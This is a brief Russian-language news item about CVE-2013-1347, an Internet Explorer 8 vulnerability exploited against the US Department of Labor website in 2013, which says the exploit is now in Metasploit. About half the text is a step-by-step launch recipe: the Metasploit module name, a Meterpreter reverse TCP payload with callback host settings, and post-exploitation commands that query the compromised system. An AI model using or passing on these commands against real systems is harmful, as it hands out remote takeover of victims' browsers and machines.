Компания Microsoft подтвердила наличие критической уязвимости в браузере Internet Explorer 8, которая использовалась для проведения атаки на сайт Министерства труда США в апреле-мае 2013 года.
Уязвимость получила классификационный номер CVE-2013-1347, а также OSVDB-92993 и MSA-2847140.
Сам эксплойт был опубликован в открытом доступе 30 апреля 2013 года, а вчера его добавили в набор Metasploit.
Для запуска эксплойта нужно установить Metasploit и запустить следующую последовательность команд.
use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.178.36 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
Подробнее см. демо.
